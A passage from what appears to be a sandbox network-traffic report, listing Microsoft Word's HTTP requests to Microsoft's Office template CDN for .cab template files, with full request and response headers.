      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1881952
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
      Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
      ETag: 0x8D60DDC0007D57D
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: c3e299e4-301e-0068-0e2c-b46638000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:26 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328908.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31083
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: iamBjmZY1zpztkJSL/hwHw==
      Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
      ETag: 0x8D36AC8865F4922
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7551dfc1-501e-00b3-0597-a02a87000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328916.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 26944
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
      Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
      ETag: 0x8D36AC886C4C4EE
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 1184cf03-901e-010a-18fd-bfd090000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328919.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 22149
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
      Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
      ETag: 0x8D36AC8871139C3
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: bd32d8ea-801e-0033-2376-14dfee000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328925.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 25314
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
      Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
      ETag: 0x8D36AC8875AEF5A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 77d2d97b-f01e-00d8-5fc1-a3ad73000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403393701.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 3256855
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
      Last-Modified: Wed, 29 Aug 2018 18:19:43 GMT
      ETag: 0x8D60DDBFE4BB50C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 1aa38d20-a01e-00b7-6997-a0a780000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328932.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 20554
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
      Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
      ETag: 0x8D36AC887A4CC19
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 2cfa2269-c01e-0045-22f2-a05fc9000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328935.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 23597
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
      Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
      ETag: 0x8D36AC887EFBA2F
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 56e459b1-f01e-010c-2097-a0e32f000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp1000111403.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 953453
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 1OrACenntkuLABroK4EC+g==
      Last-Modified: Thu, 12 Jul 2018 00:20:10 GMT
      ETag: 0x8D5E78D3A9D8C97
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6910c7b5-e01e-00d4-5297-a03a7b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328940.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 21791
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
      Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
      ETag: 0x8D36AC8883A8134
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: bab20722-a01e-0046-4c1d-22b4c2000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328951.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 19893
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
      Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
      ETag: 0x8D36AC8888436CF
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: f60ed86d-c01e-00fc-3b97-a05bd3000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328972.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 21111
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
      Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
      ETag: 0x8D36AC888CEAFBE
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 477f7fba-801e-00a0-169e-b90e8b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328975.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 22594
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
      Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
      ETag: 0x8D36AC889183E51
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: a209c062-f01e-003c-4097-a0a3ed000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328983.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 21875
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
      Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
      ETag: 0x8D36AC88963C8B3
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b450fbbe-c01e-00c3-7c97-a09370000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328986.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 22340
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
      Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
      ETag: 0x8D36AC889AD573C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: f2e243ab-801e-015b-4097-a04d1c000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328998.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 21357
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: l/W3t+nhKBmZRopcQssS5w==
      Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
      ETag: 0x8D36AC88A7F05EE
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d5cd4d7a-901e-011a-2b97-a015f8000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328990.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 19288
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
      Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
      ETag: 0x8D36AC88A1DF716
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345746401.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 276650
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
      Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
      ETag: 0x8D60DDB824A3C69
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: e38519df-901e-010c-7f9a-a090cd000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:26 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345744402.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 295527
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
      Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
      ETag: 0x8D60DFAA9CC48C3
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: ea01ec0c-b01e-0110-4a97-a048da000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:26 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345748501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 2591108
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: vrEqBGTQlsozuupDUs6ADw==
      Last-Modified: Wed, 29 Aug 2018 18:18:43 GMT
      ETag: 0x8D60DDBDA502B66
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4182b976-401e-0119-4e97-a0f49c000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:27 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345749101.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 261258
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
      Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
      ETag: 0x8D60DDC968C4F0E
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 02d4ae31-901e-0135-6fd0-ae1833000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
